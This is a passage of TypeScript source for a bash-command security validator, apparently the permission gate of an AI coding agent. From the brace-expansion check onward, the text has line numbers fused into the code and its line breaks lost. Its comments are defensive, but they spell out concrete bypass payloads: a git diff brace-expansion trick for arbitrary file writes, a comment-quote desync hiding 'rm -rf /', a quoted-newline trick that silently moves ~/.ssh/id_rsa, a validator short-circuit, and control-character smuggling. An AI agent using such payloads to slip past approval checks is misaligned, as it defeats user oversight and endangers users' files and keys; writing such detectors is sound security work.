  if (context.treeSitter && !context.treeSitter.hasActualOperatorNodes) {
    return { behavior: 'passthrough', message: 'No operator nodes in AST' }
  }

  if (hasBackslashEscapedOperator(context.originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_OPERATORS,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains a backslash before a shell operator (;, |, &, <, >) which can hide command structure',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No backslash-escaped operators',
  }
}

/**
 * Checks if a character at position `pos` in `content` is escaped by counting
 * consecutive backslashes before it. An odd number means it's escaped.
 */
function isEscapedAtPosition(content: string, pos: number): boolean {
  let backslashCount = 0
  let i = pos - 1
  while (i >= 0 && content[i] === '\\') {
    backslashCount++
    i--
  }
  return backslashCount % 2 === 1
}
Sequence: {1..5} → 1 2 3 4 51746 *1747 * Both single and double quotes suppress brace expansion in Bash, so we use1748 * fullyUnquotedContent which has both quote types stripped.1749 * Backslash-escaped braces (\{, \}) also suppress expansion.1750 */1751function validateBraceExpansion(context: ValidationContext): PermissionResult {1752 // Use pre-strip content to avoid false negatives from stripSafeRedirections1753 // creating backslash adjacencies (e.g., `\>/dev/null{a,b}` → `\{a,b}` after1754 // stripping, making isEscapedAtPosition think the brace is escaped).1755 const content = context.fullyUnquotedPreStrip17561757 // SECURITY: Check for MISMATCHED brace counts in fullyUnquoted content.1758 // A mismatch indicates that quoted braces (e.g., `'{'` or `"{"`) were1759 // stripped by extractQuotedContent, leaving unbalanced braces in the content1760 // we analyze. Our depth-matching algorithm below assumes balanced braces —1761 // with a mismatch, it closes at the WRONG position, missing commas that1762 // bash's algorithm WOULD find.1763 //1764 // Exploit: `git diff {@'{'0},--output=/tmp/pwned}`1765 // - Original: 2 `{`, 2 `}` (quoted `'{'` counts as content, not operator)1766 // - fullyUnquoted: `git diff {@0},--output=/tmp/pwned}` — 1 `{`, 2 `}`!1767 // - Our depth-matcher: closes at first `}` (after `0`), inner=`@0`, no `,`1768 // - Bash (on original): quoted `{` is content; first unquoted `}` has no1769 // `,` yet → bash treats as literal content, keeps scanning → finds `,`1770 // → final `}` closes → expands to `@{0} --output=/tmp/pwned`1771 // - git writes diff to /tmp/pwned. ARBITRARY FILE WRITE, ZERO PERMISSIONS.1772 //1773 // We count ONLY unescaped braces (backslash-escaped braces are literal in1774 // bash). 
If counts mismatch AND at least one unescaped `{` exists, block —1775 // our depth-matching cannot be trusted on this content.1776 let unescapedOpenBraces = 01777 let unescapedCloseBraces = 01778 for (let i = 0; i < content.length; i++) {1779 if (content[i] === '{' && !isEscapedAtPosition(content, i)) {1780 unescapedOpenBraces++1781 } else if (content[i] === '}' && !isEscapedAtPosition(content, i)) {1782 unescapedCloseBraces++1783 }1784 }1785 // Only block when CLOSE count EXCEEDS open count — this is the specific1786 // attack signature. More `}` than `{` means a quoted `{` was stripped1787 // (bash saw it as content, we see extra `}` unaccounted for). The inverse1788 // (more `{` than `}`) is usually legitimate unclosed/escaped braces like1789 // `{foo` or `{a,b\}` where bash doesn't expand anyway.1790 if (unescapedOpenBraces > 0 && unescapedCloseBraces > unescapedOpenBraces) {1791 logEvent('tengu_bash_security_check_triggered', {1792 checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,1793 subId: 2,1794 })1795 return {1796 behavior: 'ask',1797 message:1798 'Command has excess closing braces after quote stripping, indicating possible brace expansion obfuscation',1799 }1800 }18011802 // SECURITY: Additionally, check the ORIGINAL command (before quote stripping)1803 // for `'{'` or `"{"` INSIDE an unquoted brace context — this is the specific1804 // attack primitive. A quoted brace inside an outer unquoted `{...}` is1805 // essentially always an obfuscation attempt; legitimate commands don't nest1806 // quoted braces inside brace expansion (awk/find patterns are fully quoted,1807 // like `awk '{print $1}'` where the OUTER brace is inside quotes too).1808 //1809 // This catches the attack even if an attacker crafts a payload with balanced1810 // stripped braces (defense-in-depth). 
We use a simple heuristic: if the1811 // original command has `'{'` or `'}'` or `"{"` or `"}"` (quoted single brace)1812 // AND also has an unquoted `{`, that's suspicious.1813 if (unescapedOpenBraces > 0) {1814 const orig = context.originalCommand1815 // Look for quoted single-brace patterns: '{', '}', "{", "}"1816 // These are the attack primitive — a brace char wrapped in quotes.1817 if (/['"][{}]['"]/.test(orig)) {1818 logEvent('tengu_bash_security_check_triggered', {1819 checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,1820 subId: 3,1821 })1822 return {1823 behavior: 'ask',1824 message:1825 'Command contains quoted brace character inside brace context (potential brace expansion obfuscation)',1826 }1827 }1828 }18291830 // Scan for unescaped `{` characters, then check if they form brace expansion.1831 // We use a manual scan rather than a simple regex lookbehind because1832 // lookbehinds can't handle double-escaped backslashes (\\{ is unescaped `{`).1833 for (let i = 0; i < content.length; i++) {1834 if (content[i] !== '{') continue1835 if (isEscapedAtPosition(content, i)) continue18361837 // Find matching unescaped `}` by tracking nesting depth.1838 // Previous approach broke on nested `{`, missing commas between the outer1839 // `{` and the nested one (e.g., `{--upload-pack="evil",{test}}`).1840 let depth = 11841 let matchingClose = -11842 for (let j = i + 1; j < content.length; j++) {1843 const ch = content[j]1844 if (ch === '{' && !isEscapedAtPosition(content, j)) {1845 depth++1846 } else if (ch === '}' && !isEscapedAtPosition(content, j)) {1847 depth--1848 if (depth === 0) {1849 matchingClose = j1850 break1851 }1852 }1853 }18541855 if (matchingClose === -1) continue18561857 // Check for `,` or `..` at the outermost nesting level between this1858 // `{` and its matching `}`. 
Only depth-0 triggers matter — bash splits1859 // brace expansion at outer-level commas/sequences.1860 let innerDepth = 01861 for (let k = i + 1; k < matchingClose; k++) {1862 const ch = content[k]1863 if (ch === '{' && !isEscapedAtPosition(content, k)) {1864 innerDepth++1865 } else if (ch === '}' && !isEscapedAtPosition(content, k)) {1866 innerDepth--1867 } else if (innerDepth === 0) {1868 if (1869 ch === ',' ||1870 (ch === '.' && k + 1 < matchingClose && content[k + 1] === '.')1871 ) {1872 logEvent('tengu_bash_security_check_triggered', {1873 checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,1874 subId: 1,1875 })1876 return {1877 behavior: 'ask',1878 message:1879 'Command contains brace expansion that could alter command parsing',1880 }1881 }1882 }1883 }1884 // No expansion at this level — don't skip past; inner pairs will be1885 // caught by subsequent iterations of the outer loop.1886 }18871888 return {1889 behavior: 'passthrough',1890 message: 'No brace expansion detected',1891 }1892}18931894// Matches Unicode whitespace characters that shell-quote treats as word1895// separators but bash treats as literal word content. 
While this differential1896// is defense-favorable (shell-quote over-splits), blocking these proactively1897// prevents future edge cases.1898// eslint-disable-next-line no-misleading-character-class1899const UNICODE_WS_RE =1900 /[\u00A0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000\uFEFF]/19011902function validateUnicodeWhitespace(1903 context: ValidationContext,1904): PermissionResult {1905 const { originalCommand } = context1906 if (UNICODE_WS_RE.test(originalCommand)) {1907 logEvent('tengu_bash_security_check_triggered', {1908 checkId: BASH_SECURITY_CHECK_IDS.UNICODE_WHITESPACE,1909 })1910 return {1911 behavior: 'ask',1912 message:1913 'Command contains Unicode whitespace characters that could cause parsing inconsistencies',1914 }1915 }1916 return { behavior: 'passthrough', message: 'No Unicode whitespace' }1917}19181919function validateMidWordHash(context: ValidationContext): PermissionResult {1920 const { unquotedKeepQuoteChars } = context1921 // Match # preceded by a non-whitespace character (mid-word hash).1922 // shell-quote treats mid-word # as comment-start but bash treats it as a1923 // literal character, creating a parser differential.1924 //1925 // Uses unquotedKeepQuoteChars (which preserves quote delimiters but strips1926 // quoted content) to catch quote-adjacent # like 'x'# — fullyUnquotedPreStrip1927 // would strip both quotes and content, turning 'x'# into just # (word-start).1928 //1929 // SECURITY: Also check the CONTINUATION-JOINED version. The context is built1930 // from the original command (pre-continuation-join). For `foo\<NL>#bar`,1931 // pre-join the `#` is preceded by `\n` (whitespace → `/\S#/` doesn't match),1932 // but post-join it's preceded by `o` (non-whitespace → matches). 
shell-quote1933 // operates on the post-join text (line continuations are joined in1934 // splitCommand), so the parser differential manifests on the joined text.1935 // While not directly exploitable (the `#...` fragment still prompts as its1936 // own subcommand), this is a defense-in-depth gap — shell-quote would drop1937 // post-`#` content from path extraction.1938 //1939 // Exclude ${# which is bash string-length syntax (e.g., ${#var}).1940 // Note: the lookbehind must be placed immediately before # (not before \S)1941 // so that it checks the correct 2-char window.1942 const joined = unquotedKeepQuoteChars.replace(/\\+\n/g, match => {1943 const backslashCount = match.length - 11944 return backslashCount % 2 === 1 ? '\\'.repeat(backslashCount - 1) : match1945 })1946 if (1947 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() with atom search: fast when # absent1948 /\S(?<!\$\{)#/.test(unquotedKeepQuoteChars) ||1949 // eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above1950 /\S(?<!\$\{)#/.test(joined)1951 ) {1952 logEvent('tengu_bash_security_check_triggered', {1953 checkId: BASH_SECURITY_CHECK_IDS.MID_WORD_HASH,1954 })1955 return {1956 behavior: 'ask',1957 message:1958 'Command contains mid-word # which is parsed differently by shell-quote vs bash',1959 }1960 }1961 return { behavior: 'passthrough', message: 'No mid-word hash' }1962}19631964/**1965 * Detects when a `#` comment contains quote characters that would desync1966 * downstream quote trackers (like extractQuotedContent).1967 *1968 * In bash, everything after an unquoted `#` on a line is a comment — quote1969 * characters inside the comment are literal text, not quote toggles. But our1970 * quote-tracking functions don't handle comments, so a `'` or `"` after `#`1971 * toggles their quote state. 
Attackers can craft `# ' "` sequences that1972 * precisely desync the tracker, causing subsequent content (on following1973 * lines) to appear "inside quotes" when it's actually unquoted in bash.1974 *1975 * Example attack:1976 * echo "it's" # ' " <<'MARKER'\n1977 * rm -rf /\n1978 * MARKER1979 * In bash: `#` starts a comment, `rm -rf /` executes on line 2.1980 * In extractQuotedContent: the `'` at position 14 (after #) opens a single1981 * quote, and the `'` before MARKER closes it. But the `'` after MARKER opens1982 * ANOTHER single quote, swallowing the newline and `rm -rf /`, so1983 * validateNewlines sees no unquoted newlines.1984 *1985 * Defense: If we see an unquoted `#` followed by any quote character on the1986 * same line, treat it as a misparsing concern. Legitimate commands rarely1987 * have quote characters in their comments (and if they do, the user can1988 * approve manually).1989 */1990function validateCommentQuoteDesync(1991 context: ValidationContext,1992): PermissionResult {1993 // Tree-sitter path: tree-sitter correctly identifies comment nodes and1994 // quoted content. The desync concern is about regex quote tracking being1995 // confused by quote characters inside comments. 
When tree-sitter provides1996 // the quote context, this desync cannot happen — the AST is authoritative1997 // regardless of whether the command contains a comment.1998 if (context.treeSitter) {1999 return {2000 behavior: 'passthrough',2001 message: 'Tree-sitter quote context is authoritative',2002 }2003 }20042005 const { originalCommand } = context20062007 // Track quote state character-by-character using the same (correct) logic2008 // as extractQuotedContent: single quotes don't toggle inside double quotes.2009 // When we encounter an unquoted `#`, check if the rest of the line (until2010 // newline) contains any quote characters.2011 let inSingleQuote = false2012 let inDoubleQuote = false2013 let escaped = false20142015 for (let i = 0; i < originalCommand.length; i++) {2016 const char = originalCommand[i]20172018 if (escaped) {2019 escaped = false2020 continue2021 }20222023 if (inSingleQuote) {2024 if (char === "'") inSingleQuote = false2025 continue2026 }20272028 if (char === '\\') {2029 escaped = true2030 continue2031 }20322033 if (inDoubleQuote) {2034 if (char === '"') inDoubleQuote = false2035 // Single quotes inside double quotes are literal — no toggle2036 continue2037 }20382039 if (char === "'") {2040 inSingleQuote = true2041 continue2042 }20432044 if (char === '"') {2045 inDoubleQuote = true2046 continue2047 }20482049 // Unquoted `#` — in bash, this starts a comment. Check if the rest of2050 // the line contains quote characters that would desync other trackers.2051 if (char === '#') {2052 const lineEnd = originalCommand.indexOf('\n', i)2053 const commentText = originalCommand.slice(2054 i + 1,2055 lineEnd === -1 ? 
originalCommand.length : lineEnd,2056 )2057 if (/['"]/.test(commentText)) {2058 logEvent('tengu_bash_security_check_triggered', {2059 checkId: BASH_SECURITY_CHECK_IDS.COMMENT_QUOTE_DESYNC,2060 })2061 return {2062 behavior: 'ask',2063 message:2064 'Command contains quote characters inside a # comment which can desync quote tracking',2065 }2066 }2067 // Skip to end of line (rest is comment)2068 if (lineEnd === -1) break2069 i = lineEnd // Loop increment will move past newline2070 }2071 }20722073 return { behavior: 'passthrough', message: 'No comment quote desync' }2074}20752076/**2077 * Detects a newline inside a quoted string where the NEXT line would be2078 * stripped by stripCommentLines (trimmed line starts with `#`).2079 *2080 * In bash, `\n` inside quotes is a literal character and part of the argument.2081 * But stripCommentLines (called by stripSafeWrappers in bashPermissions before2082 * path validation and rule matching) processes commands LINE-BY-LINE via2083 * `command.split('\n')` without tracking quote state. A quoted newline lets an2084 * attacker position the next line to start with `#` (after trim), causing2085 * stripCommentLines to drop that line entirely — hiding sensitive paths or2086 * arguments from path validation and permission rule matching.2087 *2088 * Example attack (auto-allowed in acceptEdits mode without any Bash rules):2089 * mv ./decoy '<\n>#' ~/.ssh/id_rsa ./exfil_dir2090 * Bash: moves ./decoy AND ~/.ssh/id_rsa into ./exfil_dir/ (errors on `\n#`).2091 * stripSafeWrappers: line 2 starts with `#` → stripped → "mv ./decoy '".2092 * shell-quote: drops unbalanced trailing quote → ["mv", "./decoy"].2093 * checkPathConstraints: only sees ./decoy (in cwd) → passthrough.2094 * acceptEdits mode: mv with all-cwd paths → ALLOW. 
Zero clicks, no warning.2095 *2096 * Also works with cp (exfil), rm/rm -rf (delete arbitrary files/dirs).2097 *2098 * Defense: block ONLY the specific stripCommentLines trigger — a newline inside2099 * quotes where the next line starts with `#` after trim. This is the minimal2100 * check that catches the parser differential while preserving legitimate2101 * multi-line quoted arguments (echo 'line1\nline2', grep patterns, etc.).2102 * Safe heredocs ($(cat <<'EOF'...)) and git commit -m "..." are handled by2103 * early validators and never reach this check.2104 *2105 * This validator is NOT in nonMisparsingValidators — its ask result gets2106 * isBashSecurityCheckForMisparsing: true, causing an early block in the2107 * permission flow at bashPermissions.ts before any line-based processing runs.2108 */2109function validateQuotedNewline(context: ValidationContext): PermissionResult {2110 const { originalCommand } = context21112112 // Fast path: must have both a newline byte AND a # character somewhere.2113 // stripCommentLines only strips lines where trim().startsWith('#'), so2114 // no # means no possible trigger.2115 if (!originalCommand.includes('\n') || !originalCommand.includes('#')) {2116 return { behavior: 'passthrough', message: 'No newline or no hash' }2117 }21182119 // Track quote state. Mirrors extractQuotedContent / validateCommentQuoteDesync:2120 // - single quotes don't toggle inside double quotes2121 // - backslash escapes the next char (but not inside single quotes)2122 // stripCommentLines splits on '\n' (not \r), so we only treat \n as a line2123 // separator. 
\r inside a line is removed by trim() and doesn't change the2124 // trimmed-starts-with-# check.2125 let inSingleQuote = false2126 let inDoubleQuote = false2127 let escaped = false21282129 for (let i = 0; i < originalCommand.length; i++) {2130 const char = originalCommand[i]21312132 if (escaped) {2133 escaped = false2134 continue2135 }21362137 if (char === '\\' && !inSingleQuote) {2138 escaped = true2139 continue2140 }21412142 if (char === "'" && !inDoubleQuote) {2143 inSingleQuote = !inSingleQuote2144 continue2145 }21462147 if (char === '"' && !inSingleQuote) {2148 inDoubleQuote = !inDoubleQuote2149 continue2150 }21512152 // A newline inside quotes: the NEXT line (from bash's perspective) starts2153 // inside a quoted string. Check if that line would be stripped by2154 // stripCommentLines — i.e., after trim(), does it start with `#`?2155 // This exactly mirrors: lines.filter(l => !l.trim().startsWith('#'))2156 if (char === '\n' && (inSingleQuote || inDoubleQuote)) {2157 const lineStart = i + 12158 const nextNewline = originalCommand.indexOf('\n', lineStart)2159 const lineEnd = nextNewline === -1 ? originalCommand.length : nextNewline2160 const nextLine = originalCommand.slice(lineStart, lineEnd)2161 if (nextLine.trim().startsWith('#')) {2162 logEvent('tengu_bash_security_check_triggered', {2163 checkId: BASH_SECURITY_CHECK_IDS.QUOTED_NEWLINE,2164 })2165 return {2166 behavior: 'ask',2167 message:2168 'Command contains a quoted newline followed by a #-prefixed line, which can hide arguments from line-based permission checks',2169 }2170 }2171 }2172 }21732174 return { behavior: 'passthrough', message: 'No quoted newline-hash pattern' }2175}21762177/**2178 * Validates that the command doesn't use Zsh-specific dangerous commands that2179 * can bypass security checks. 
These commands provide capabilities like loading2180 * kernel modules, raw file I/O, network access, and pseudo-terminal execution2181 * that circumvent normal permission checks.2182 *2183 * Also catches `fc -e` which can execute arbitrary editors on command history,2184 * and `emulate` which with `-c` is an eval-equivalent.2185 */2186function validateZshDangerousCommands(2187 context: ValidationContext,2188): PermissionResult {2189 const { originalCommand } = context21902191 // Extract the base command from the original command, stripping leading2192 // whitespace, env var assignments, and Zsh precommand modifiers.2193 // e.g., "FOO=bar command builtin zmodload" -> "zmodload"2194 const ZSH_PRECOMMAND_MODIFIERS = new Set([2195 'command',2196 'builtin',2197 'noglob',2198 'nocorrect',2199 ])2200 const trimmed = originalCommand.trim()2201 const tokens = trimmed.split(/\s+/)2202 let baseCmd = ''2203 for (const token of tokens) {2204 // Skip env var assignments (VAR=value)2205 if (/^[A-Za-z_]\w*=/.test(token)) continue2206 // Skip Zsh precommand modifiers (they don't change what command runs)2207 if (ZSH_PRECOMMAND_MODIFIERS.has(token)) continue2208 baseCmd = token2209 break2210 }22112212 if (ZSH_DANGEROUS_COMMANDS.has(baseCmd)) {2213 logEvent('tengu_bash_security_check_triggered', {2214 checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,2215 subId: 1,2216 })2217 return {2218 behavior: 'ask',2219 message: `Command uses Zsh-specific '${baseCmd}' which can bypass security checks`,2220 }2221 }22222223 // Check for `fc -e` which allows executing arbitrary commands via editor2224 // fc without -e is safe (just lists history), but -e specifies an editor2225 // to run on the command, effectively an eval2226 if (baseCmd === 'fc' && /\s-\S*e/.test(trimmed)) {2227 logEvent('tengu_bash_security_check_triggered', {2228 checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,2229 subId: 2,2230 })2231 return {2232 behavior: 'ask',2233 message:2234 "Command uses 'fc -e' which can 
execute arbitrary commands via editor",2235 }2236 }22372238 return {2239 behavior: 'passthrough',2240 message: 'No Zsh dangerous commands',2241 }2242}22432244// Matches non-printable control characters that have no legitimate use in shell2245// commands: 0x00-0x08, 0x0B-0x0C, 0x0E-0x1F, 0x7F. Excludes tab (0x09),2246// newline (0x0A), and carriage return (0x0D) which are handled by other2247// validators. Bash silently drops null bytes and ignores most control chars,2248// so an attacker can use them to slip metacharacters past our checks while2249// bash still executes them (e.g., "echo safe\x00; rm -rf /").2250// eslint-disable-next-line no-control-regex2251const CONTROL_CHAR_RE = /[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/22522253/**2254 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is2255 * unavailable. The primary gate is parseForSecurity (ast.ts).2256 */2257export function bashCommandIsSafe_DEPRECATED(2258 command: string,2259): PermissionResult {2260 // SECURITY: Block control characters before any other processing. Null bytes2261 // and other non-printable chars are silently dropped by bash but confuse our2262 // validators, allowing metacharacters adjacent to them to slip through.2263 if (CONTROL_CHAR_RE.test(command)) {2264 logEvent('tengu_bash_security_check_triggered', {2265 checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,2266 })2267 return {2268 behavior: 'ask',2269 message:2270 'Command contains non-printable control characters that could be used to bypass security checks',2271 isBashSecurityCheckForMisparsing: true,2272 }2273 }22742275 // SECURITY: Detect '\' patterns that exploit shell-quote's incorrect handling2276 // of backslashes inside single quotes. 
Must run before shell-quote parsing.2277 if (hasShellQuoteSingleQuoteBug(command)) {2278 return {2279 behavior: 'ask',2280 message:2281 'Command contains single-quoted backslash pattern that could bypass security checks',2282 isBashSecurityCheckForMisparsing: true,2283 }2284 }22852286 // SECURITY: Strip heredoc bodies before running security validators.2287 // Only strip bodies for quoted/escaped delimiters (<<'EOF', <<\EOF) where2288 // the body is literal text — $(), backticks, and ${} are NOT expanded.2289 // Unquoted heredocs (<<EOF) undergo full shell expansion, so their bodies2290 // may contain executable command substitutions that validators must see.2291 // When extractHeredocs bails out (can't parse safely), the raw command2292 // goes through all validators — which is the safe direction.2293 const { processedCommand } = extractHeredocs(command, { quotedOnly: true })22942295 const baseCommand = command.split(' ')[0] || ''2296 const { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars } =2297 extractQuotedContent(processedCommand, baseCommand === 'jq')22982299 const context: ValidationContext = {2300 originalCommand: command,2301 baseCommand,2302 unquotedContent: withDoubleQuotes,2303 fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),2304 fullyUnquotedPreStrip: fullyUnquoted,2305 unquotedKeepQuoteChars,2306 }23072308 const earlyValidators = [2309 validateEmpty,2310 validateIncompleteCommands,2311 validateSafeCommandSubstitution,2312 validateGitCommit,2313 ]23142315 for (const validator of earlyValidators) {2316 const result = validator(context)2317 if (result.behavior === 'allow') {2318 return {2319 behavior: 'passthrough',2320 message:2321 result.decisionReason?.type === 'other' ||2322 result.decisionReason?.type === 'safetyCheck'2323 ? result.decisionReason.reason2324 : 'Command allowed',2325 }2326 }2327 if (result.behavior !== 'passthrough') {2328 return result.behavior === 'ask'2329 ? 
{ ...result, isBashSecurityCheckForMisparsing: true as const }2330 : result2331 }2332 }23332334 // Validators that don't set isBashSecurityCheckForMisparsing — their ask2335 // results go through the standard permission flow rather than being blocked2336 // early. LF newlines and redirections are normal patterns that splitCommand2337 // handles correctly, not misparsing concerns.2338 //2339 // NOTE: validateCarriageReturn is NOT here — CR IS a misparsing concern.2340 // shell-quote's `[^\s]` treats CR as a word separator (JS `\s` ⊃ \r), but2341 // bash IFS does NOT include CR. splitCommand collapses CR→space, which IS2342 // misparsing. See validateCarriageReturn for the full attack trace.2343 const nonMisparsingValidators = new Set([2344 validateNewlines,2345 validateRedirections,2346 ])23472348 const validators = [2349 validateJqCommand,2350 validateObfuscatedFlags,2351 validateShellMetacharacters,2352 validateDangerousVariables,2353 // Run comment-quote-desync BEFORE validateNewlines: it detects cases where2354 // the quote tracker would miss newlines due to # comment desync.2355 validateCommentQuoteDesync,2356 // Run quoted-newline BEFORE validateNewlines: it detects the INVERSE case2357 // (newlines INSIDE quotes, which validateNewlines ignores by design). 
Quoted2358 // newlines let attackers split commands across lines so that line-based2359 // processing (stripCommentLines) drops sensitive content.2360 validateQuotedNewline,2361 // CR check runs BEFORE validateNewlines — CR is a MISPARSING concern2362 // (shell-quote/bash tokenization differential), LF is not.2363 validateCarriageReturn,2364 validateNewlines,2365 validateIFSInjection,2366 validateProcEnvironAccess,2367 validateDangerousPatterns,2368 validateRedirections,2369 validateBackslashEscapedWhitespace,2370 validateBackslashEscapedOperators,2371 validateUnicodeWhitespace,2372 validateMidWordHash,2373 validateBraceExpansion,2374 validateZshDangerousCommands,2375 // Run malformed token check last - other validators should catch specific patterns first2376 // (e.g., $() substitution, backticks, etc.) since they have more precise error messages2377 validateMalformedTokenInjection,2378 ]23792380 // SECURITY: We must NOT short-circuit when a non-misparsing validator2381 // returns 'ask' if there are still misparsing validators later in the list.2382 // Non-misparsing ask results are discarded at bashPermissions.ts:~1301-13032383 // (the gate only blocks when isBashSecurityCheckForMisparsing is set). If2384 // validateRedirections (index 10, non-misparsing) fires first on `>`, it2385 // returns ask-without-flag — but validateBackslashEscapedOperators (index 12,2386 // misparsing) would have caught `\;` WITH the flag. Short-circuiting lets a2387 // payload like `cat safe.txt \; echo /etc/passwd > ./out` slip through.2388 //2389 // Fix: defer non-misparsing ask results. Continue running validators; if any2390 // misparsing validator fires, return THAT (with the flag). 
Only if we reach2391 // the end without a misparsing ask, return the deferred non-misparsing ask.2392 let deferredNonMisparsingResult: PermissionResult | null = null2393 for (const validator of validators) {2394 const result = validator(context)2395 if (result.behavior === 'ask') {2396 if (nonMisparsingValidators.has(validator)) {2397 if (deferredNonMisparsingResult === null) {2398 deferredNonMisparsingResult = result2399 }2400 continue2401 }2402 return { ...result, isBashSecurityCheckForMisparsing: true as const }2403 }2404 }2405 if (deferredNonMisparsingResult !== null) {2406 return deferredNonMisparsingResult2407 }24082409 return {2410 behavior: 'passthrough',2411 message: 'Command passed all security checks',2412 }2413}24142415/**2416 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is2417 * unavailable. The primary gate is parseForSecurity (ast.ts).2418 *2419 * Async version of bashCommandIsSafe that uses tree-sitter when available2420 * for more accurate parsing. Falls back to the sync regex version when2421 * tree-sitter is not available.2422 *2423 * This should be used by async callers (bashPermissions.ts, bashCommandHelpers.ts).2424 * Sync callers (readOnlyValidation.ts) should continue using bashCommandIsSafe().2425 */2426export async function bashCommandIsSafeAsync_DEPRECATED(2427 command: string,2428 onDivergence?: () => void,2429): Promise<PermissionResult> {2430 // Try to get tree-sitter analysis2431 const parsed = await ParsedCommand.parse(command)2432 const tsAnalysis = parsed?.getTreeSitterAnalysis() ?? 
null24332434 // If no tree-sitter, fall back to sync version2435 if (!tsAnalysis) {2436 return bashCommandIsSafe_DEPRECATED(command)2437 }24382439 // Run the same security checks but with tree-sitter enriched context.2440 // The early checks (control chars, shell-quote bug) don't benefit from2441 // tree-sitter, so we run them identically.2442 if (CONTROL_CHAR_RE.test(command)) {2443 logEvent('tengu_bash_security_check_triggered', {2444 checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,2445 })2446 return {2447 behavior: 'ask',2448 message:2449 'Command contains non-printable control characters that could be used to bypass security checks',2450 isBashSecurityCheckForMisparsing: true,2451 }2452 }24532454 if (hasShellQuoteSingleQuoteBug(command)) {2455 return {2456 behavior: 'ask',2457 message:2458 'Command contains single-quoted backslash pattern that could bypass security checks',2459 isBashSecurityCheckForMisparsing: true,2460 }2461 }24622463 const { processedCommand } = extractHeredocs(command, { quotedOnly: true })24642465 const baseCommand = command.split(' ')[0] || ''24662467 // Use tree-sitter quote context for more accurate analysis2468 const tsQuote = tsAnalysis.quoteContext2469 const regexQuote = extractQuotedContent(2470 processedCommand,2471 baseCommand === 'jq',2472 )24732474 // Use tree-sitter quote context as primary, but keep regex as reference2475 // for divergence logging2476 const withDoubleQuotes = tsQuote.withDoubleQuotes2477 const fullyUnquoted = tsQuote.fullyUnquoted2478 const unquotedKeepQuoteChars = tsQuote.unquotedKeepQuoteChars24792480 const context: ValidationContext = {2481 originalCommand: command,2482 baseCommand,2483 unquotedContent: withDoubleQuotes,2484 fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),2485 fullyUnquotedPreStrip: fullyUnquoted,2486 unquotedKeepQuoteChars,2487 treeSitter: tsAnalysis,2488 }24892490 // Log divergence between tree-sitter and regex quote extraction.2491 // Skip for heredoc commands: tree-sitter 
strips (quoted) heredoc bodies2492 // to nothing while the regex path replaces them with placeholder strings2493 // (via extractHeredocs), so the two outputs can never match. Logging2494 // divergence for every heredoc command would poison the signal.2495 //2496 // onDivergence callback: when called in a fanout loop (bashPermissions.ts2497 // Promise.all over subcommands), the caller batches divergences into a2498 // single logEvent instead of N separate calls. Each logEvent triggers2499 // getEventMetadata() → buildProcessMetrics() → process.memoryUsage() →2500 // /proc/self/stat read; with memoized metadata these resolve as microtasks2501 // and starve the event loop (CC-643). Single-command callers omit the2502 // callback and get the original per-call logEvent behavior.2503 if (!tsAnalysis.dangerousPatterns.hasHeredoc) {2504 const hasDivergence =2505 tsQuote.fullyUnquoted !== regexQuote.fullyUnquoted ||2506 tsQuote.withDoubleQuotes !== regexQuote.withDoubleQuotes2507 if (hasDivergence) {2508 if (onDivergence) {2509 onDivergence()2510 } else {2511 logEvent('tengu_tree_sitter_security_divergence', {2512 quoteContextDivergence: true,2513 })2514 }2515 }2516 }25172518 const earlyValidators = [2519 validateEmpty,2520 validateIncompleteCommands,2521 validateSafeCommandSubstitution,2522 validateGitCommit,2523 ]25242525 for (const validator of earlyValidators) {2526 const result = validator(context)2527 if (result.behavior === 'allow') {2528 return {2529 behavior: 'passthrough',2530 message:2531 result.decisionReason?.type === 'other' ||2532 result.decisionReason?.type === 'safetyCheck'2533 ? result.decisionReason.reason2534 : 'Command allowed',2535 }2536 }2537 if (result.behavior !== 'passthrough') {2538 return result.behavior === 'ask'2539 ? 
{ ...result, isBashSecurityCheckForMisparsing: true as const }2540 : result2541 }2542 }25432544 const nonMisparsingValidators = new Set([2545 validateNewlines,2546 validateRedirections,2547 ])25482549 const validators = [2550 validateJqCommand,2551 validateObfuscatedFlags,2552 validateShellMetacharacters,2553 validateDangerousVariables,2554 validateCommentQuoteDesync,2555 validateQuotedNewline,2556 validateCarriageReturn,2557 validateNewlines,2558 validateIFSInjection,2559 validateProcEnvironAccess,2560 validateDangerousPatterns,2561 validateRedirections,2562 validateBackslashEscapedWhitespace,2563 validateBackslashEscapedOperators,2564 validateUnicodeWhitespace,2565 validateMidWordHash,2566 validateBraceExpansion,2567 validateZshDangerousCommands,2568 validateMalformedTokenInjection,2569 ]25702571 let deferredNonMisparsingResult: PermissionResult | null = null2572 for (const validator of validators) {2573 const result = validator(context)2574 if (result.behavior === 'ask') {2575 if (nonMisparsingValidators.has(validator)) {2576 if (deferredNonMisparsingResult === null) {2577 deferredNonMisparsingResult = result2578 }2579 continue2580 }2581 return { ...result, isBashSecurityCheckForMisparsing: true as const }2582 }2583 }2584 if (deferredNonMisparsingResult !== null) {2585 return deferredNonMisparsingResult2586 }25872588 return {2589 behavior: 'passthrough',2590 message: 'Command passed all security checks',2591 }2592}2593